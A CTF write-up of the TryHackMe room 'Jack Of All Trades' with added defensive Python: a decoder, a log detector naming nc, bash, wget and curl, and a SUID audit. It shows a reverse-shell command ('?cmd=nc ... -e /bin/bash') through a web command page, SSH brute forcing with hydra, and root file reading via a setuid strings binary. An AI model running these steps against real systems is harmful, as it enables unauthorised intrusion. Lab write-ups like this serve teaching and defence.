TryHackMe - Jack Of All Trades

DonMichele
6 min read · Feb 4, 2021

A new hacking journey: there are 2 flags waiting for us (user and root). Let's get them and conquer this challenge!

I started with a scan of the IP address I was given, to see what was running on the server. I found 2 open ports, 22 and 80, but there was something weird: the services that normally run on them were swapped, with HTTP on port 22 and SSH on port 80. Kinda weird, to be honest, but I went on with the analysis.

NMAP Scan

I configured the proxy settings in Firefox to be able to access the website on port 22. There wasn't much on its main page, just some things about Jack. Well, we could say that we have a potential username to work with later.

Web Site Home Page

I then checked the source code of this page and found two things in a comment: a subpage of the website and something that looked like an encoded string. Checking it, I figured out that it was base64.

Web Site Page Source

I decoded that string and got a password.

Web Site Discovered Password

For the moment, I didn't have much to work with. I tried to SSH in using "jack" as the user and the password I had just discovered, but it didn't work. Then I remembered the page mentioned in the same comment where I found the base64 string. I tried to log in there with the same credentials, but that didn't work either.

Web Site Sub Page

I checked the source code for this page and I found another encoded string.

New Encoded String

I had a look at it and, based on the characters it contained, I figured out it was base32 (you can also use online tools to detect the encoding type, there are plenty). Decoding it gave me a result that was encoded in hex. I decoded that one too and... guess what? Still an encoded string, but this time it looked very clearly like a Caesar cipher. I checked all 26 shifts and one of them finally gave an answer. It was a link, but when I accessed it, I just got a Wikipedia page. Nothing too relevant, I thought at that point, but it does contain a clue (I discovered that in a different way).
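The layered decoding described above (base32, then hex, then a Caesar shift) can be automated so that you do not have to try the 26 shifts by hand. The following is an added example and not code from the original write-up; the wrapped URL, the shift of 7 and the list of clue-like tokens used to rank the shifts are all constructed for the demonstration, since the room's real string is not reproduced here.

```python
import base64
import binascii
import string

# Constructed sample, not the room's actual string: a clue URL wrapped as
# Caesar(shift 7) -> hex -> base32, the same three layers the write-up describes.
PLAINTEXT = "https://en.wikipedia.org/wiki/Example"
# Tokens that typically show up in a decoded CTF clue; used to rank Caesar shifts (assumption).
CLUE_TOKENS = ("http", "www", "wiki", "org", "com", "the", "flag")


def caesar(text: str, shift: int) -> str:
    """Shift ASCII letters by `shift` positions; a negative shift undoes a positive one."""
    out = []
    for ch in text:
        if ch in string.ascii_lowercase:
            out.append(chr((ord(ch) - 97 + shift) % 26 + 97))
        elif ch in string.ascii_uppercase:
            out.append(chr((ord(ch) - 65 + shift) % 26 + 65))
        else:
            out.append(ch)
    return "".join(out)


def build_sample(plaintext: str = PLAINTEXT, shift: int = 7) -> str:
    """Wrap plaintext in the three layers so the decoder below has something to peel."""
    hex_layer = caesar(plaintext, shift).encode().hex()
    return base64.b32encode(hex_layer.encode()).decode()


SAMPLE = build_sample()


def looks_like_base32(s: str) -> bool:
    # Standard alphabet is A-Z and 2-7, '=' padded to a multiple of 8. A string made only of
    # the digits 2-7 would also pass this test, so treat the result as a hint, not proof.
    return bool(s) and len(s) % 8 == 0 and set(s) <= set(string.ascii_uppercase + "234567=")


def looks_like_hex(s: str) -> bool:
    return bool(s) and len(s) % 2 == 0 and set(s) <= set(string.hexdigits)


def peel(s: str):
    """Strip base32/hex layers until the text is neither; returns (layers, remainder)."""
    layers = []
    while True:
        try:
            if looks_like_base32(s):
                s = base64.b32decode(s).decode("utf-8", errors="replace")
                layers.append("base32")
            elif looks_like_hex(s):
                s = bytes.fromhex(s).decode("utf-8", errors="replace")
                layers.append("hex")
            else:
                return layers, s
        except (binascii.Error, ValueError):
            # Looked like an encoding but did not decode: stop and hand back what we have.
            return layers, s


def caesar_candidates(text: str):
    """All 26 possible shifts, the list you would otherwise check one by one."""
    return [(shift, caesar(text, -shift)) for shift in range(26)]


def best_caesar(text: str):
    """Rank the 26 shifts by how many clue tokens each candidate contains; lowest shift wins ties."""
    scored = []
    for shift, cand in caesar_candidates(text):
        low = cand.lower()
        score = sum(low.count(tok) for tok in CLUE_TOKENS)
        scored.append((score, -shift, shift, cand))
    scored.sort(reverse=True)
    _, _, shift, cand = scored[0]
    return shift, cand


def decode_clue(s: str) -> dict:
    """Full pipeline: peel base32/hex layers, then pick the most plausible Caesar shift."""
    layers, rest = peel(s)
    shift, plain = best_caesar(rest)
    return {"layers": layers + ["caesar"], "shift": shift, "plaintext": plain}


if __name__ == "__main__":
    print(decode_clue(SAMPLE))
```

The token-based ranking is deliberately simple: for a short string such as a URL, letter-frequency scoring is unreliable, whereas a handful of expected substrings ("http", "wiki", "org") picks the right shift immediately. If none of the candidates scores, fall back to reading `caesar_candidates()` by eye, exactly as the write-up did.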

Anyway, I also ran a scan with gobuster, to see if I could find some subpages. After a simple scan (using the small.txt wordlist), I found a subdirectory.

Gobuster Scan

I accessed that page and found some photos. The name of one of them made me suspect steganography, so I checked whether something was hidden in it.

Photos Found

I checked that file with steghide, and it asked me for a password. I remembered the password I had found at the beginning and typed that one; it worked. I got a text file, but it didn't contain the info I was hoping for. It did confirm that I was on the right track; I just had to try a different image.

Steghide Image 1

After doing the same thing with a different image, using the same password as before, I found a file with some credentials! My first reaction was to try to connect via SSH with them, which I attempted, but it didn't work.

Steghide Right Image

Then I remembered the subpage I had discovered earlier, the one with the login form. I used those credentials and I was in!

Logged In Form Page

Well, we are greeted by a message telling us that, somehow, we should give the page a 'cmd' and it will run it. It looked like 'cmd' would be the parameter name, so I tried to run a simple command, 'ls'. I added "?cmd=ls" to the end of the URL and pressed Enter. Seeing that it listed 2 index.php files made me realise that we can exploit this. The next step? Run a command that gives us a reverse shell, in order to get access to the server. Instead of "ls", I now added the reverse shell command, the whole part needed in the URL becoming:

?cmd=nc <MyTryHackMeIP> 4444 -e /bin/bash

For this to work, I had previously started a netcat listener on port 4444 on my machine, using nc -lvnp 4444.
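From the defender's side, both steps above (the harmless-looking ?cmd=ls probe and the reverse-shell payload that followed it) land in the web server's access log, and a page that passes a query parameter straight to a shell is easy to spot there. The following detector is an added example, not code from the write-up or the room; the Apache log lines, the client IPs (from the 203.0.113.0/24 documentation range), the /subpage.php path and the list of parameter names treated as command carriers are all constructed for the demonstration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache "combined" log lines mirroring the probing described in the write-up:
# a ?cmd=ls probe, then a reverse-shell payload in the same parameter, then normal traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [04/Feb/2021:10:15:01 +0000] "GET /subpage.php?cmd=ls HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [04/Feb/2021:10:15:42 +0000] "GET /subpage.php?cmd=nc%20203.0.113.5%204444%20-e%20/bin/bash HTTP/1.1" 200 0 "-" "Mozilla/5.0"
203.0.113.9 - - [04/Feb/2021:10:16:03 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, method, request target and status from a combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Parameter names that commonly carry an OS command in "run a command" pages (assumption).
COMMAND_PARAMS = {"cmd", "exec", "command", "execute", "run", "system", "shell"}
# Shell metacharacters and tool names that seldom belong in a legitimate query-string value.
SHELL_RE = re.compile(r"(/bin/|\b(?:nc|ncat|bash|sh|wget|curl|python3?|perl)\b|[;|&`]|\$\()")


def scan_line(line: str):
    """Return a finding dict for a suspicious request, or None for a clean or unparsable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = urlsplit(m.group("target")).query
    params = parse_qs(query, keep_blank_values=True)  # percent-decodes the values for us
    for name, values in params.items():
        for value in values:
            if SHELL_RE.search(value):
                severity = "high"          # shell syntax or a tool name inside a parameter
            elif name.lower() in COMMAND_PARAMS:
                severity = "low"           # command-style parameter, value still innocuous
            else:
                continue
            return {
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "status": m.group("status"),
                "severity": severity,
                "param": name,
                "value": value,
            }
    return None


def scan_log(text: str):
    """Findings for every line of an access log, in log order."""
    return [f for f in (scan_line(line) for line in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The "low" tier matters as much as the "high" one: in the write-up the `?cmd=ls` probe came first, and an alert on it would have fired before the reverse shell was even attempted. The same parameter names and metacharacters make a reasonable starting point for a WAF or mod_security rule, but the real fix is in the application, which should never hand a request parameter to a shell.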

After getting access as the www-data user, I spawned a proper shell to work more comfortably and checked the /home directory to see which user folders I could find. I saw jack's home folder (I tried to enter it, but the permissions didn't allow me) and another file, owned by root, named jacks_password_list. And it was world-readable.

Obtained Shell

Well, I checked its content and there were several passwords inside. I saved them locally in a file. Then I tried SSH again with the passwords from that list, using hydra, and finally got in as jack!

Hydra Brute Force

I thought the flag would be in a text file, but the only thing I saw was a photo. I downloaded it locally by running the following command in my local terminal:

scp -P 80 jack@10.10.94.26:/home/jack/user.jpg .

When I opened the image, the flag was written on it, as you can see below:

User Flag

Now all I had left was the root flag. I checked whether I could run any commands with sudo, but I wasn't able to. I also checked for any cron jobs I could exploit, but there was nothing to work with. So I decided to upload linpeas.sh from my machine to the victim's. I started an HTTP server with python3 in the directory where I had the script and used wget in the shell where I was connected as jack to download it. After getting it, I ran the script and checked whether there was anything useful to exploit.

Among the SUID files, I saw /usr/bin/strings, so I decided to use that to read the root flag file.

Linpeas Scan

Assuming that this time the flag wasn't a picture again, I tried to read /root/root.txt with the /usr/bin/strings executable, and it worked: I had the root flag.
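The root step works only because a binary that has no business being setuid, /usr/bin/strings, was given the bit; on the defensive side the check is to compare every setuid/setgid file on a host against a baseline from a clean install of the same release and flag the extras. The audit below is an added example, not code from the write-up or from linpeas; the baseline list is an assumption (trim it to your own distribution), and the demo builds a throwaway directory tree with a setuid "strings", a normal "ls" and a baseline "passwd" so that it can run offline without touching the real filesystem.

```python
import os
import stat
import tempfile

# Paths (relative to the audited root) that are setuid on a stock Debian/Ubuntu install.
# Assumption for this example: generate yours from a clean image of the same release.
EXPECTED_SUID = {
    "usr/bin/passwd", "usr/bin/sudo", "usr/bin/su", "bin/su", "usr/bin/chsh", "usr/bin/chfn",
    "usr/bin/gpasswd", "usr/bin/newgrp", "bin/mount", "bin/umount", "usr/bin/mount",
    "usr/bin/umount", "usr/bin/pkexec",
}
SKIP_DIRS = {"proc", "sys", "dev", "run"}  # pseudo-filesystems directly under the root


def find_suid(root="/"):
    """(relative path, permission bits, owner uid) for every regular file with setuid or setgid set."""
    hits = []
    root = os.path.abspath(root)
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        if os.path.abspath(dirpath) == root:
            dirnames[:] = [d for d in dirnames if d not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append((os.path.relpath(path, root), stat.S_IMODE(st.st_mode), st.st_uid))
    return sorted(hits)


def unexpected_suid(root="/", baseline=EXPECTED_SUID):
    """Setuid/setgid files not in the baseline: each one is a candidate for `chmod u-s,g-s`."""
    return [h for h in find_suid(root) if h[0] not in baseline]


def demo_in_tempdir():
    """Audit a constructed tree: setuid 'strings' (as on the box), normal 'ls', baseline 'passwd'."""
    with tempfile.TemporaryDirectory() as root:
        bindir = os.path.join(root, "usr", "bin")
        os.makedirs(bindir)
        for name, mode in (("strings", 0o4755), ("ls", 0o755), ("passwd", 0o4755)):
            path = os.path.join(bindir, name)
            with open(path, "w") as fh:
                fh.write("#!/bin/sh\nexit 0\n")
            os.chmod(path, mode)
        return [path for path, _, _ in unexpected_suid(root)]


if __name__ == "__main__":
    print(demo_in_tempdir())  # ['usr/bin/strings']
```

Run `unexpected_suid("/")` as root on a real host to get the same list linpeas shows, minus the expected entries; anything left should either be stripped of the bit or added to the baseline with a documented reason. Scheduling it and diffing against the previous run turns a one-off privilege-escalation check into an ongoing integrity control.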

Root Flag

That’s it, I found both flags required! I hope you found this useful!
